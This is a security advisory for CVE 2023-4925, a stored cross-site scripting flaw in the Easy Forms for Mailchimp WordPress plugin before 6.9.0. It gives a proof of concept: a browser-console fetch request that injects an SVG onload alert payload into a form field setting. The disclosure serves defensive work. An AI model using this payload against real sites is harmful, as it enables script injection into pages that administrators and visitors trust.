Easy Forms for Mailchimp < 6.9.0 – Admin+ Stored Cross-Site Scripting | CVE 2023-4925

Description

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed

Proof of Concept

1) Create a new opt-in form
2) Edit the form, and add a "First name" field.
3) Update the form
4) Staying on the same page, run the following code in your browser console:

```
await fetch(document.forms[0].action, {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    "body": `form-name=Test+form&form-description=Test+description&field%5BFNAME%5D%5Blabel%5D=First+Name&field%5BFNAME%5D%5Btype%5D=birthday\"'/><svg%20onload=alert(document.domain)>&field%5BFNAME%5D%5Bmerge%5D=FNAME&field%5BFNAME%5D%5Bposition%5D=1&field%5BFNAME%5D%5Bplaceholder%5D=&field%5BFNAME%5D%5Bdefault%5D=&field%5BFNAME%5D%5Bdescription%5D=&field%5BFNAME%5D%5Badditional-classes%5D=&yikes-easy-mc-form-class-names=&yikes-easy-mc-inline-form%5B%5D=0&yikes-easy-mc-submit-button-type%5B%5D=text&yikes-easy-mc-submit-button-text=Submit&yikes-easy-mc-submit-button-image=&yikes-easy-mc-submit-button-classes=&yikes-easy-mc-form-restriction-start-date=&yikes-easy-mc-form-restriction-start-time=&yikes-easy-mc-form-restriction-end-date=&yikes-easy-mc-form-restriction-end-time=&yikes-easy-mc-form-restriction-pending-message=Signup+is+not+yet+open%2C+and+will+be+available+on+September+12%2C+2023+at+8%3A13PM.+Please+come+back+then+to+signup.&yikes-easy-mc-form-restriction-expired-message=This+signup+for+this+form+ended+on+September+13%2C+2023+at+8%3A13PM.&yikes-easy-mc-form-restriction-login-message=You+need+to+be+logged+in+to+sign+up+for+this+mailing+list.&yikes-easy-mc-success-message=&yikes-easy-mc-success-single-optin-message=&yikes-easy-mc-user-resubscribed-success-message=&yikes-easy-mc-user-update-link=&yikes-easy-mc-user-subscribed-message=&yikes-easy-mc-update-email-successful=&yikes-easy-mc-update-email-failure=&yikes-easy-mc-general-error-message=&yikes-easy-mc-user-email-subject=&yikes-easy-mc-user-email-body=Greetings%2C%0D%0A%0D%0AA+request+has+been+made+to+update+your+Mailchimp+account+profile+information.+To+do+so+please+use+the+following+link%3A+%5Blink%5DUpdate+Mailchimp+Profile+Info%5B%2Flink%5D%0D%0A%0D%0AIf+you+did+not+request+this+update%2C+please+disregard+this+email.%0D%0A%0D%0A%26nbsp%3B%0D%0A%0D%0AThis+email+was+sent+from%3A+%5Burl%5D%0D%0A%0D%0A%26nbsp%3B%0D%0A%0D%0A%26nbsp%3B%0D%0A%3Cp+style%3D%22font-size%3A+13px%3B+margin-top%3A+5em%3B%22%3E%3Cem%3EThis+email+was+generated+by+the+%3Ca+href%3D%22http%3A%2F%2Fwww.wordpress.org%2Fplugins%2Fyikes-inc-easy-mailchimp-extender%2F%22+target%3D%22_blank%22+rel%3D%22noopener%22%3EEasy+Forms+for+Mailchimp%3C%2Fa%3E+plugin%2C+created+by+%3Ca+href%3D%22http%3A%2F%2Fwww.yikesinc.com%22+target%3D%22_blank%22+rel%3D%22noopener%22%3EYIKES+Inc.%3C%2Fa%3E%3C%2Fem%3E%3C%2Fp%3E&form_switcher=1&associated-list=${document.getElementById('associated-list').value }&single-double-optin=1&update-existing-user=1&update-existing-email=1&form-ajax-submission=1&redirect-user-on-submission=0&redirect-user-to-selection=1&custom-redirect-url=&redirect_new_window=0&hide-form-post-signup=0&replace-interest-groups=1`,
    "method": "POST",
    "mode": "cors"
});
```

Refresh the page and notice the alert box Javascript snippet we injected in `field[FNAME][type]` popping up.